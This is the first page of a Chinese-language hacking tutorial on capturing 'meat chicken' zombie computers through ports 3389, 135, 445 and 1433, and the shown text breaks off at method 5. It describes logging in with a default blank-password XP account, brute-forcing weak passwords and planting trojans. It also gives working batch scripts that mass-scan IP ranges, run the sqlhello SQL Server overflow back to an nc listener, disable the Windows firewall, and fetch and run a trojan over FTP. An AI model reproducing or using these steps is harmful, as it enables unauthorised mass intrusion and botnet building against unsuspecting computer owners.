各种端口抓肉鸡办法[网络技术]

各端口抓肉鸡办法的汇总,网络上这篇文章普通都不全,在这里贴出完好版.

　　1、扫3389端口抓肉鸡(合适新手)(抓不了国外肉鸡)

　　目前国内网络上传播着一种克隆版的XP,安装后会默许开启一个账号为new,密码为空的账户,并且基本上都是开着3389的,我们便可以操纵这一点来抓肉鸡.首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面衔接开放3389的机械(也可以把后果保存为文本文件,用批量生成3389衔接的工具来衔接),然后输入账号new登入,假如别人的电脑前没人的话你便可以去你的空间下载你传好的木马安装拉~~这种办法只针XP系统,假如碰到2000大概2003系统就不要试了呵呵.缺陷也很明显,假如别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需求用工具开),大概电脑前有人你就不大概去翻开IE下载木马了.

　　2、扫135端口抓肉鸡

　　首先先用端口扫描器扫一段IP的135端口,然后把后果保存,再用NTSCAN过滤有弱口令的机械,最后用recton开telnet传马.因为目前135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫.(具体动画可以去黑客网站搜索135)

　　3、扫445端口抓肉鸡

　　和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把后果保存,再用NTSCAN过滤有弱口令的机械,最后用啊D工具包开同享传马.因为目前135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫.(具体动画可以去黑客网站搜索445)

　　4、1433端口批量溢出抓肉鸡

　　这个办法可以实现全自动抓鸡,不过目前太多人搞,成功率已经不高了.

　　要用到的工具:S扫 sqlhello.exe nc.exe 批处理文件

　　首先先写个批处理,翻开记事本,把以下代码复制改正后,储存为扫描+溢出.bat文件

@echo off
for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556

　　还要新建一个tt.txt,里面你要扫的IP段,格局为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格

　　1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是背面NC监听的端口.

　　然后再写个批处理

@echo off
Nc -l -vv -p 556>daima.txt
echo username>>daima.txt
echo password>>daima.txt
echo bin>>daima.txt(以2进制传输数据)
echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(关闭WINDOWS自带防火墙)
ftp -s:daima.txt
xxx.exe(也是填你木马的文件名)
del daima.txt

　　注意上面的代码回车符别删掉,要不然就没法下你的马了.

　　更多的代码去本站找找

　　上面的步骤都搞好后,便可以开始扫肉鸡了.

　　先翻开多个NC.bat,然后再翻开扫描+溢出.bat,然后你便可以去睡大觉了.自动扫描,扫描完后自动溢出,溢出后还自动下马履行,爽吧!所以这里讲具体点,呵呵.还有42 21端口也可以这样溢出,只要用这些端口的溢出工具就行了,具体动画可以去黑客网站搜索1433.

　　忘了说,上面的工具和批处理什么的都要放在同一个文件夹下.

　　先歇息一下,打这么多字累死了

　　持续

5、扫1433抓肉鸡之办法2

　　要用到的工具:端口扫描

[1] [2] [3]  下一页